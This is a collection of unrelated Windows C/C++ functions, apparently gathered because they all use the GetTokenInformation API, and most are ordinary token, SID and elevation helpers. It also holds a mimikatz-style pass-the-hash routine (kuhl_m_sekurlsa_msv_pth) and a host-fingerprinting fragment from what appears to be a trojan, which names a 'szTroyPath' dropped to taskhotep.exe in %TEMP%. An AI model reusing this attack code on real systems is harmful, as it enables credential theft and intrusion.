CString GetCacheID() { CString t; CAutoGeneralHandle token; BOOL result = OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, token.GetPointer()); if(result) { DWORD len = 0; GetTokenInformation(token, TokenStatistics, NULL, 0, &len); if (len >= sizeof (TOKEN_STATISTICS)) { std::unique_ptr<BYTE[]> data (new BYTE[len]); GetTokenInformation(token, TokenStatistics, data.get(), len, &len); LUID uid = ((PTOKEN_STATISTICS)data.get())->AuthenticationId; t.Format(_T("-%08x%08x"), uid.HighPart, uid.LowPart); } } return t; }
int InitUserSid(BOOL fDiagnostic, BPRINT_BUFFER *pbp) { int err = 0; if ( ! ls.UserSid) { LPVOID pvInfo = NULL; DWORD cbSize = 0; if ( ! GetTokenInformation(ls.hToken, TokenUser, NULL, 0, &cbSize)) { err = GetLastError(); if (ERROR_INSUFFICIENT_BUFFER == err) { err = 0; pvInfo = LocalAlloc(LPTR, cbSize); if ( ! pvInfo) { err = ERROR_OUTOFMEMORY; } else if ( ! GetTokenInformation(ls.hToken, TokenUser, pvInfo, cbSize, &cbSize)) { err = GetLastError(); ReportError(err, "GetTokenInformation(TokenUser)"); } else { err = 0; const TOKEN_USER * pUser = (const TOKEN_USER *)pvInfo; ls.UserSid = pUser->User.Sid; if (fDiagnostic) { bprintf(*pbp, TEXT("Got User Sid ")); PrintSidName(ls.UserSid, *pbp); bprint_Sep(*pbp, ' '); PrintSidText(ls.UserSid, *pbp); bprint_EndLine(*pbp); } } } } } return err; }
/* function 'zbx_get_process_username' require 'userName' with size 'MAX_NAME' */ static int zbx_get_process_username(HANDLE hProcess, char *userName) { HANDLE tok; TOKEN_USER *ptu = NULL; DWORD sz = 0, nlen, dlen; wchar_t name[MAX_NAME], dom[MAX_NAME]; int iUse, res = FAIL; /* clean result; */ *userName = '******'; /* open the processes token */ if (0 == OpenProcessToken(hProcess, TOKEN_QUERY, &tok)) return res; /* Get required buffer size and allocate the TOKEN_USER buffer */ if (0 == GetTokenInformation(tok, (TOKEN_INFORMATION_CLASS)1, (LPVOID)ptu, 0, &sz)) { if (GetLastError() != ERROR_INSUFFICIENT_BUFFER) goto lbl_err; ptu = (PTOKEN_USER)zbx_malloc(ptu, sz); } /* Get the token user information from the access token. */ if (0 == GetTokenInformation(tok, (TOKEN_INFORMATION_CLASS)1, (LPVOID)ptu, sz, &sz)) goto lbl_err; /* get the account/domain name of the SID */ nlen = MAX_NAME; dlen = MAX_NAME; if (0 == LookupAccountSid(NULL, ptu->User.Sid, name, &nlen, dom, &dlen, (PSID_NAME_USE)&iUse)) goto lbl_err; zbx_unicode_to_utf8_static(name, userName, MAX_NAME); res = SUCCEED; lbl_err: zbx_free(ptu); CloseHandle(tok); return res; }
/* http://www.dotnet247.com/247reference/msgs/39/195403.aspx // internal static string[] WindowsIdentity._GetRoles (IntPtr token) */ MonoArray* ves_icall_System_Security_Principal_WindowsIdentity_GetRoles (gpointer token) { MonoArray *array = NULL; MonoDomain *domain = mono_domain_get (); #ifdef HOST_WIN32 gint32 size = 0; MONO_ARCH_SAVE_REGS; GetTokenInformation (token, TokenGroups, NULL, size, (PDWORD)&size); if (size > 0) { TOKEN_GROUPS *tg = g_malloc0 (size); if (GetTokenInformation (token, TokenGroups, tg, size, (PDWORD)&size)) { int i=0; int num = tg->GroupCount; array = mono_array_new (domain, mono_get_string_class (), num); for (i=0; i < num; i++) { gint32 size = 0; gunichar2 *uniname = GetSidName (NULL, tg->Groups [i].Sid, &size); if (uniname) { MonoString *str = mono_string_new_utf16 (domain, uniname, size); mono_array_setref (array, i, str); g_free (uniname); } } } g_free (tg); } #else /* POSIX-compliant systems should use IsMemberOfGroupId or IsMemberOfGroupName */ g_warning ("WindowsIdentity._GetRoles should never be called on POSIX"); #endif if (!array) { /* return empty array of string, i.e. string [0] */ array = mono_array_new (domain, mono_get_string_class (), 0); } return array; }
CxDlgAccountPassword::CxDlgAccountPassword(CWnd* pParent /*=NULL*/) : CDialog(CxDlgAccountPassword::IDD, pParent) { HANDLE hProcess, hAccessToken; DWORD dwInfoBufferSize, dwDomainSize =1024; TCHAR tchszUser [1024]; TCHAR tchszDomain [1024]; DWORD dwUserNameLen = sizeof(tchszUser); TCHAR InfoBuffer[1000]; PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer; SID_NAME_USE snu; // // Get the domain name that this user is logged on to. This could // also be the local machine name. CString strAccount = _T(""); hProcess = GetCurrentThread(); if (!OpenThreadToken (hProcess,TOKEN_QUERY, TRUE, &hAccessToken)) { if(GetLastError() == ERROR_NO_TOKEN) { // attempt to open the process token, since no thread token // exists BOOL bOk = OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hAccessToken); } } if (GetTokenInformation(hAccessToken, TokenUser, InfoBuffer, 1000, &dwInfoBufferSize)) { tchszDomain[0] = _T('\0'); if (LookupAccountSid(NULL, pTokenUser->User.Sid, tchszUser, &dwUserNameLen, tchszDomain, &dwDomainSize, &snu)) { if (tchszDomain[0]) { // // Use the account name of form "DomainName\UserName" if (B_ACCOUNT_CURRENT_USER) strAccount.Format (_T("%s\\%s"), tchszDomain, tchszUser); else strAccount.Format (_T("%s\\%s"), tchszDomain, _T("ingres")); } else { strAccount = B_ACCOUNT_CURRENT_USER? tchszUser: _T("ingres"); } } } //{{AFX_DATA_INIT(CxDlgAccountPassword) m_strAccount = _T(""); m_strPassword = _T(""); m_strConfirmPassword = _T(""); //}}AFX_DATA_INIT m_strAccount = strAccount; }
// checks user SID in both tokens for equality bool SecurityHelper::IsSameUser(HANDLE hToken1, HANDLE hToken2, bool* pbIsSameUser) { *pbIsSameUser = false; bool result = false; const DWORD bufSize = sizeof(TOKEN_USER) + SECURITY_MAX_SID_SIZE; char buf1[bufSize]; char buf2[bufSize]; DWORD cb; if (GetTokenInformation(hToken1, TokenUser, buf1, bufSize, &cb) && GetTokenInformation(hToken2, TokenUser, buf2, bufSize, &cb)) { *pbIsSameUser = EqualSid(((TOKEN_USER*)buf1)->User.Sid, ((TOKEN_USER*)buf2)->User.Sid) ? true : false; result = true; } else LCF1(L"GetTokenInformation failed: %d", GetLastError()); return result; }
BOOL kull_m_token_getNameDomainFromToken(HANDLE hToken, PWSTR * pName, PWSTR * pDomain, PWSTR * pSid, PSID_NAME_USE pSidNameUse) { BOOL result = FALSE; PTOKEN_USER pTokenUser; DWORD szNeeded; if(!GetTokenInformation(hToken, TokenUser, NULL, 0, &szNeeded) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER)) { if(pTokenUser = (PTOKEN_USER) LocalAlloc(LPTR, szNeeded)) { if(GetTokenInformation(hToken, TokenUser, pTokenUser, szNeeded, &szNeeded)) { if((result = kull_m_token_getNameDomainFromSID(pTokenUser->User.Sid, pName, pDomain, pSidNameUse, NULL)) && pSid) result = ConvertSidToStringSid(pTokenUser->User.Sid, pSid); } LocalFree(pTokenUser); } } return result; }
std::vector<unsigned char> GetTokenInfo(HANDLE hToken, TOKEN_INFORMATION_CLASS tokenClass) { std::vector<unsigned char> ret; DWORD cbTokenInfo; if (!GetTokenInformation(hToken, tokenClass, nullptr, 0, &cbTokenInfo)) { if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) { ret.resize(cbTokenInfo); if (!GetTokenInformation(hToken, tokenClass, &ret[0], (DWORD)ret.size(), &cbTokenInfo)) { ret.clear(); } } } return ret; }
NTSTATUS kuhl_m_sekurlsa_msv_pth(int argc, wchar_t * argv[]) { BYTE ntlm[LM_NTLM_HASH_LENGTH] = {0}; TOKEN_STATISTICS tokenStats; MSV1_0_PTH_DATA data = {&(tokenStats.AuthenticationId), NULL, NULL, ntlm, FALSE}; PCWCHAR szRun, szNTLM, pFakeUserName, pFakeLogonDomain; DWORD i, j, dwNeededSize; HANDLE hToken; PROCESS_INFORMATION processInfos; if(pFakeUserName = kuhl_m_sekurlsa_msv_pth_makefakestring(argc, argv, L"user", &data.UserName)) { if(pFakeLogonDomain = kuhl_m_sekurlsa_msv_pth_makefakestring(argc, argv, L"domain", &data.LogonDomain)) { if(kull_m_string_args_byName(argc, argv, L"ntlm", &szNTLM, NULL)) { kull_m_string_args_byName(argc, argv, L"run", &szRun, L"cmd.exe"); if(wcslen(szNTLM) == (LM_NTLM_HASH_LENGTH * 2)) { for(i = 0; i < LM_NTLM_HASH_LENGTH; i++) { swscanf_s(&szNTLM[i*2], L"%02x", &j); ntlm[i] = (BYTE) j; } kprintf(L"NTLM\t: "); kull_m_string_wprintf_hex(data.NtlmHash, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n"); kprintf(L"Program\t: %s\n", szRun); if(kull_m_process_create(KULL_M_PROCESS_CREATE_LOGON, szRun, CREATE_SUSPENDED, NULL, LOGON_NETCREDENTIALS_ONLY, pFakeUserName, pFakeLogonDomain, L"", &processInfos, FALSE)) { kprintf( L" | PID %u\n" L" | TID %u\n", processInfos.dwProcessId, processInfos.dwThreadId); if(OpenProcessToken(processInfos.hProcess, TOKEN_READ, &hToken)) { if(GetTokenInformation(hToken, TokenStatistics, &tokenStats, sizeof(tokenStats), &dwNeededSize)) { kprintf(L" | LUID %u ; %u (%08x:%08x)\n", tokenStats.AuthenticationId.HighPart, tokenStats.AuthenticationId.LowPart, tokenStats.AuthenticationId.HighPart, tokenStats.AuthenticationId.LowPart); kprintf(L" \\_ "); kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_msv_pth, &data); } else PRINT_ERROR_AUTO(L"GetTokenInformation"); CloseHandle(hToken); } else PRINT_ERROR_AUTO(L"OpenProcessToken"); NtResumeProcess(processInfos.hProcess); CloseHandle(processInfos.hThread); CloseHandle(processInfos.hProcess); } else PRINT_ERROR_AUTO(L"CreateProcessWithLogonW"); } else PRINT_ERROR(L"ntlm hash length must be 32 (16 bytes)\n"); } else PRINT_ERROR(L"Missing argument : ntlm\n"); LocalFree((HLOCAL) pFakeLogonDomain); } LocalFree((HLOCAL) pFakeUserName); } return STATUS_SUCCESS; }
NTSTATUS FspToolGetTokenInfo(HANDLE Token, TOKEN_INFORMATION_CLASS TokenInformationClass, PVOID *PInfo) { PVOID Info = 0; DWORD Size; NTSTATUS Result; if (GetTokenInformation(Token, TokenInformationClass, 0, 0, &Size)) { Result = STATUS_INVALID_PARAMETER; goto exit; } if (ERROR_INSUFFICIENT_BUFFER != GetLastError()) { Result = FspNtStatusFromWin32(GetLastError()); goto exit; } Info = MemAlloc(Size); if (0 == Info) { Result = STATUS_INSUFFICIENT_RESOURCES; goto exit; } if (!GetTokenInformation(Token, TokenInformationClass, Info, Size, &Size)) { Result = FspNtStatusFromWin32(GetLastError()); goto exit; } *PInfo = Info; Result = STATUS_SUCCESS; exit: if (!NT_SUCCESS(Result)) MemFree(Info); return Result; }
MonoString* ves_icall_System_Security_Principal_WindowsIdentity_GetTokenName (gpointer token) { MonoString *result = NULL; gunichar2 *uniname = NULL; gint32 size = 0; #ifdef HOST_WIN32 MONO_ARCH_SAVE_REGS; GetTokenInformation (token, TokenUser, NULL, size, (PDWORD)&size); if (size > 0) { TOKEN_USER *tu = g_malloc0 (size); if (GetTokenInformation (token, TokenUser, tu, size, (PDWORD)&size)) { uniname = GetSidName (NULL, tu->User.Sid, &size); } g_free (tu); } #else gchar *uname = GetTokenName ((uid_t) GPOINTER_TO_INT (token)); MONO_ARCH_SAVE_REGS; if (uname) { size = strlen (uname); uniname = g_utf8_to_utf16 (uname, size, NULL, NULL, NULL); g_free (uname); } #endif /* HOST_WIN32 */ if (size > 0) { result = mono_string_new_utf16 (mono_domain_get (), uniname, size); } else result = mono_string_new (mono_domain_get (), ""); if (uniname) g_free (uniname); return result; }
LPVOID RetrieveTokenInformation(HANDLE hToken, TOKEN_INFORMATION_CLASS infoClass, DWORD& rSize) { assert(hToken); LPVOID pInfo = NULL; GetTokenInformation(hToken, infoClass, NULL, 0, &rSize); if (rSize == 0) { DOLOG("GetTokenInformation GetSize Failed!"); return NULL; } pInfo = malloc(rSize); if (TRUE != GetTokenInformation(hToken, infoClass, pInfo, rSize, &rSize)) { DOLOG("GetTokenInformation Failed!"); return NULL; } return pInfo; }
BOOL FakeStartupIsDone(void) { OSVERSIONINFO osv; TOKEN_STATISTICS tst; DWORD osz; HANDLE hToken; HKEY hk; TCHAR sinfo[MAX_PATH]; osv.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&osv); if (osv.dwPlatformId != VER_PLATFORM_WIN32_NT) { OutputDebugString(_T("FakeStartupIsDone::No Need")); return TRUE; } if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { OutputDebugString(_T("FakeStartupIsDone::OpenProcessToken")); return FALSE; } if (!GetTokenInformation(hToken, TokenStatistics, &tst, sizeof(TOKEN_STATISTICS), &osz)) { CloseHandle(hToken); OutputDebugString(_T("FakeStartupIsDone::GetTokenInformation")); return FALSE; } CloseHandle(hToken); _sntprintf(sinfo, MAX_PATH - 1, _T("%s\\%08x%08x"), SESSIONINFOKEY, tst.AuthenticationId.HighPart, tst.AuthenticationId.LowPart); sinfo[MAX_PATH - 1] = 0; if (RegCreateKeyEx(HKEY_CURRENT_USER, sinfo, 0, NULL, REG_OPTION_VOLATILE, MAXIMUM_ALLOWED, NULL, &hk, NULL)) { OutputDebugString(_T("FakeStartupIsDone::RegCreateKeyExA SessionInfo")); return FALSE; } if (RegCreateKeyEx(hk, _T("StartupHasBeenRun"), 0, NULL, REG_OPTION_VOLATILE, KEY_WRITE, NULL, &hk, NULL)) { OutputDebugString(_T("FakeStartupIsDone::RegCreateKeyExA StartupHasBeenRun")); RegCloseKey(hk); return FALSE; } RegCloseKey(hk); return TRUE; }
void OsSysInfo(void) { computerName.resize(MAX_COMPUTERNAME_LENGTH + 1); GetComputerName((char*) computerName.c_str (), &dwSiz); userName.resize(1024); dwSiz=1024; if(GetUserName ((char*)userName.c_str (), &dwSiz)) deb("username: %s computername: %s", userName.c_str (), computerName.c_str ()); ini.set("host", "computername", computerName.c_str()); ini.set("host", "username", userName.c_str()); szPaths.resize(MAX_PATH); ExpandEnvironmentStringsA("%TEMP%", (char*) szPaths.c_str(), szPaths.size()); szTempPath = szPaths; strcat((char*) szPaths.c_str(), "\\taskhotep.exe"); strncpy(szTroyPath, szPaths.c_str(), MAX_PATH); GetSystemInfo(&systemInfo); deb("machine: %d cores: %d level: %d rev: %x", systemInfo.wProcessorArchitecture, systemInfo.dwNumberOfProcessors,systemInfo.wProcessorLevel, systemInfo.wProcessorRevision); MEMORYSTATUSEX msx; msx.dwLength = sizeof(msx); GlobalMemoryStatusEx(&msx); deb("memused: %lu%% total: %I64dMB avail: %I64dMB", msx.dwMemoryLoad,msx.ullTotalPhys/1024/1024, msx.ullAvailPhys/1024/1024); //hexdump((char*)&msx,msx.dwLength); DWORD dwTemp; TOKEN_ELEVATION_TYPE elevType ; HANDLE hToken; BOOL bOK = OpenProcessToken(GetCurrentProcess(), TOKEN_READ, &hToken); DWORD infoLen; bOK = GetTokenInformation(hToken, TokenElevationType, // type of info to retrieve &dwTemp, // receives return value sizeof(dwTemp), &infoLen); // receives returned length deb("TokenElevationType: %d", dwTemp); CloseHandle(hToken); szHostMD5 = (char*)MD5DigestString(userName+computerName).c_str (); deb("host MD5 [%s]", szHostMD5.c_str()); }
// get domain and user id for process BOOL proc2uid (HANDLE hProc, wchar_t domain[], PDWORD domlen, wchar_t username[], PDWORD ulen) { HANDLE hToken; SID_NAME_USE peUse; PTOKEN_USER pUser; BOOL bResult = FALSE; DWORD dwTokenSize = 0; // try open security token if (!OpenProcessToken(hProc, TOKEN_QUERY, &hToken)) { return FALSE; } ZeroMemory (domain, *domlen); ZeroMemory (username, *ulen); // try obtain user information size if (!GetTokenInformation (hToken, TokenUser, 0, 0, &dwTokenSize)) { if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) { pUser = xmalloc(dwTokenSize); if (pUser != NULL) { if (GetTokenInformation (hToken, TokenUser, pUser, dwTokenSize, &dwTokenSize)) { bResult = LookupAccountSid (NULL, pUser->User.Sid, username, ulen, domain, domlen, &peUse); } xfree (pUser); } } } CloseHandle (hToken); return bResult; }
static BOOL ObtainLockPagesPrivilege() { HANDLE token; PTOKEN_USER user = NULL; if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token) == TRUE) { DWORD size = 0; GetTokenInformation(token, TokenUser, NULL, 0, &size); if (size) { user = (PTOKEN_USER) LocalAlloc(LPTR, size); } GetTokenInformation(token, TokenUser, user, size, &size); CloseHandle(token); } if (!user) { return FALSE; } LSA_HANDLE handle; LSA_OBJECT_ATTRIBUTES attributes; ZeroMemory(&attributes, sizeof(attributes)); BOOL result = FALSE; if (LsaOpenPolicy(NULL, &attributes, POLICY_ALL_ACCESS, &handle) == 0) { LSA_UNICODE_STRING str = StringToLsaUnicodeString(_T(SE_LOCK_MEMORY_NAME)); if (LsaAddAccountRights(handle, user->User.Sid, &str, 1) == 0) { LOG_NOTICE("Huge pages support was successfully enabled, but reboot required to use it"); result = TRUE; } LsaClose(handle); } LocalFree(user); return result; }
HRESULT COpcSecurity::GetCurrentUserSID(PSID *ppSid) { HANDLE tkHandle; if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &tkHandle)) { TOKEN_USER *tkUser; DWORD tkSize; DWORD sidLength; // Call to get size information for alloc GetTokenInformation(tkHandle, TokenUser, NULL, 0, &tkSize); tkUser = (TOKEN_USER *) malloc(tkSize); if (tkUser == NULL) return E_OUTOFMEMORY; // Now make the real call if (GetTokenInformation(tkHandle, TokenUser, tkUser, tkSize, &tkSize)) { sidLength = GetLengthSid(tkUser->User.Sid); *ppSid = (PSID) malloc(sidLength); if (*ppSid == NULL) return E_OUTOFMEMORY; memcpy(*ppSid, tkUser->User.Sid, sidLength); CloseHandle(tkHandle); free(tkUser); return S_OK; } else { free(tkUser); return HRESULT_FROM_WIN32(GetLastError()); } } return HRESULT_FROM_WIN32(GetLastError()); }
static BOOL RunningAsSYSTEM(VOID) { /* S-1-5-18 -- Local System */ static SID SystemSid = { SID_REVISION, 1, { SECURITY_NT_AUTHORITY }, { SECURITY_LOCAL_SYSTEM_RID } }; BOOL bRet = FALSE; PTOKEN_USER pTokenUser; HANDLE hToken; DWORD cbTokenBuffer = 0; /* Get the process token */ if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) return FALSE; /* Retrieve token's information */ if (!GetTokenInformation(hToken, TokenUser, NULL, 0, &cbTokenBuffer) && GetLastError() != ERROR_INSUFFICIENT_BUFFER) { goto Quit; } pTokenUser = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cbTokenBuffer); if (!pTokenUser) goto Quit; if (GetTokenInformation(hToken, TokenUser, pTokenUser, cbTokenBuffer, &cbTokenBuffer)) { /* Compare with SYSTEM SID */ bRet = EqualSid(pTokenUser->User.Sid, &SystemSid); } HeapFree(GetProcessHeap(), 0, pTokenUser); Quit: CloseHandle(hToken); return bRet; }
static PSID GetSID(void) { HANDLE token; DWORD retlen; PTOKEN_USER userinfo = NULL; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_QUERY_SOURCE, &token)) return NULL; if (GetTokenInformation(token, TokenUser, 0, 0, &retlen) || GetLastError() != ERROR_INSUFFICIENT_BUFFER) { CloseHandle(token); return NULL; } userinfo = malloc(retlen); if (userinfo) { if (!GetTokenInformation(token, TokenUser, userinfo, retlen, &retlen)) { free(userinfo); CloseHandle(token); return NULL; } } CloseHandle(token); return userinfo->User.Sid; }
static PSID GetCurrentUserSid (void) { PSID sid = NULL; guint32 size = 0; gpointer token = ves_icall_System_Security_Principal_WindowsIdentity_GetCurrentToken (); GetTokenInformation (token, TokenUser, NULL, size, (PDWORD)&size); if (size > 0) { TOKEN_USER *tu = g_malloc0 (size); if (GetTokenInformation (token, TokenUser, tu, size, (PDWORD)&size)) { DWORD length = GetLengthSid (tu->User.Sid); sid = (PSID) g_malloc0 (length); if (!CopySid (length, sid, tu->User.Sid)) { g_free (sid); sid = NULL; } } g_free (tu); } /* Note: this SID must be freed with g_free () */ return sid; }
int os_uac_enabled(void) { HANDLE hToken; BOOL bOK = OpenProcessToken(GetCurrentProcess(), TOKEN_READ, &hToken); DWORD infoLen; LPVOID elevationType; bOK = GetTokenInformation(hToken, TokenElevationType, // type of info to retrieve &elevationType, // receives return value sizeof(elevationType), &infoLen); // receives returned length return (int) elevationType; }
/* * Call GetTokenInformation() on a token and return a dynamically sized * buffer with the information in it. This buffer must be free():d by * the calling function! */ static BOOL pgwin32_get_dynamic_tokeninfo(HANDLE token, TOKEN_INFORMATION_CLASS class___, char **InfoBuffer, char *errbuf, int errsize) { DWORD InfoBufferSize; if (GetTokenInformation(token, class___, NULL, 0, &InfoBufferSize)) { snprintf(errbuf, errsize, "could not get token information: got zero size\n"); return FALSE; } if (GetLastError() != ERROR_INSUFFICIENT_BUFFER) { snprintf(errbuf, errsize, "could not get token information: error code %lu\n", GetLastError()); return FALSE; } *InfoBuffer = malloc(InfoBufferSize); if (*InfoBuffer == NULL) { snprintf(errbuf, errsize, "could not allocate %d bytes for token information\n", (int) InfoBufferSize); return FALSE; } if (!GetTokenInformation(token, class___, *InfoBuffer, InfoBufferSize, &InfoBufferSize)) { snprintf(errbuf, errsize, "could not get token information: error code %lu\n", GetLastError()); return FALSE; } return TRUE; }
static BOOL is_process_elevated(void) { HANDLE token; if (OpenProcessToken( GetCurrentProcess(), TOKEN_QUERY, &token )) { TOKEN_ELEVATION_TYPE type; DWORD size; BOOL ret; ret = GetTokenInformation( token, TokenElevationType, &type, sizeof(type), &size ); CloseHandle( token ); return (ret && type == TokenElevationTypeFull); } return FALSE; }
APR_DECLARE(apr_status_t) apr_uid_current(apr_uid_t *uid, apr_gid_t *gid, apr_pool_t *p) { #ifdef _WIN32_WCE return APR_ENOTIMPL; #else HANDLE threadtok; DWORD needed; TOKEN_USER *usr; TOKEN_PRIMARY_GROUP *grp; if(!OpenProcessToken(GetCurrentProcess(), STANDARD_RIGHTS_READ | READ_CONTROL | TOKEN_QUERY, &threadtok)) { return apr_get_os_error(); } *uid = NULL; if (!GetTokenInformation(threadtok, TokenUser, NULL, 0, &needed) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER) && (usr = apr_palloc(p, needed)) && GetTokenInformation(threadtok, TokenUser, usr, needed, &needed)) *uid = usr->User.Sid; else return apr_get_os_error(); if (!GetTokenInformation(threadtok, TokenPrimaryGroup, NULL, 0, &needed) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER) && (grp = apr_palloc(p, needed)) && GetTokenInformation(threadtok, TokenPrimaryGroup, grp, needed, &needed)) *gid = grp->PrimaryGroup; else return apr_get_os_error(); return APR_SUCCESS; #endif }
LPVOID QueryInfo (JNIEnv * jenv, HANDLE hToken, TOKEN_INFORMATION_CLASS klass) { PORT_ACCESS_FROM_ENV (jenv); DWORD dwSize; LPVOID pData = NULL; if( !GetTokenInformation(hToken, klass, NULL, 0, &dwSize) ) { DWORD dwErr = GetLastError(); if( ERROR_INSUFFICIENT_BUFFER != dwErr ) { return NULL; } } pData = hymem_allocate_memory(dwSize); if( !GetTokenInformation(hToken, klass, pData, dwSize, &dwSize) ) { DWORD dwErr = GetLastError(); hymem_free_memory(pData); SetLastError(dwErr); return NULL; } return pData; }
static void fetch_current_pgrp_sid () { DWORD len; HANDLE ptok; if (!OpenProcessToken (GetCurrentProcess (), TOKEN_QUERY, &ptok) || !GetTokenInformation (ptok, TokenPrimaryGroup, &curr_pgrp, sizeof curr_pgrp, &len) || !CloseHandle (ptok)) { print_win_error (GetLastError ()); return; } }
bool SecurityHelper::GetLogonSessionId(HANDLE htok, LUID* pluid) { TOKEN_STATISTICS stats; DWORD cb = sizeof stats; if (GetTokenInformation(htok, TokenStatistics, &stats, cb, &cb)) { *pluid = stats.AuthenticationId; return true; } else { LCF1(L"GetTokenInformation(TokenStatistics) failed: %d", GetLastError()); return false; } }
DWORD CServer::GetGroupCount() { DWORD dwGroupCount=0; HANDLE hToken = INVALID_HANDLE_VALUE; hToken = GetToken(); if(hToken!=INVALID_HANDLE_VALUE) { DWORD dwNeeded=0; BOOL bRes=GetTokenInformation(hToken, TokenStatistics, NULL, 0, &dwNeeded ); if(bRes==FALSE && GetLastError()==ERROR_INSUFFICIENT_BUFFER) { TOKEN_STATISTICS* pBuffer=reinterpret_cast<TOKEN_STATISTICS*>( new BYTE[dwNeeded]); if(pBuffer!=NULL) { BOOL bRes=GetTokenInformation(hToken, TokenStatistics, (LPVOID)pBuffer, dwNeeded, &dwNeeded ); if(bRes==TRUE) { dwGroupCount=pBuffer->GroupCount; } } delete[] pBuffer; } CloseHandle(hToken); } return dwGroupCount; }
BOOL GetProcessUsername(HANDLE hProcess, char * userNameBuf, int bufLen) { BOOL bRet = FALSE; if(hProcess == NULL || userNameBuf == NULL || bufLen <= 0) return bRet; { HANDLE hToken; TOKEN_USER * pTokenUser = NULL; if (OpenProcessToken(hProcess,TOKEN_QUERY,&hToken)) { DWORD dwNeedLen = 0; GetTokenInformation(hToken, TokenUser, NULL, 0, &dwNeedLen); if(dwNeedLen > 0) { pTokenUser = (TOKEN_USER *)malloc(dwNeedLen); if(GetTokenInformation(hToken, TokenUser, pTokenUser, dwNeedLen, &dwNeedLen)) { SID_NAME_USE sn; char szDomainName[MAX_PATH] = {0}; DWORD dwDmLen = MAX_PATH; if(LookupAccountSid(NULL, pTokenUser->User.Sid, userNameBuf, &bufLen, szDomainName, &dwDmLen, &sn)) { bRet = TRUE; } } if(pTokenUser) { free(pTokenUser); pTokenUser = NULL; } } CloseHandle(hToken); } } return bRet; }
BOOL IsElevated() { BOOL fRet = FALSE; HANDLE hToken = NULL; if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { TOKEN_ELEVATION Elevation; DWORD cbSize = sizeof(TOKEN_ELEVATION); if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) fRet = Elevation.TokenIsElevated; } if (hToken) CloseHandle(hToken); return fRet; }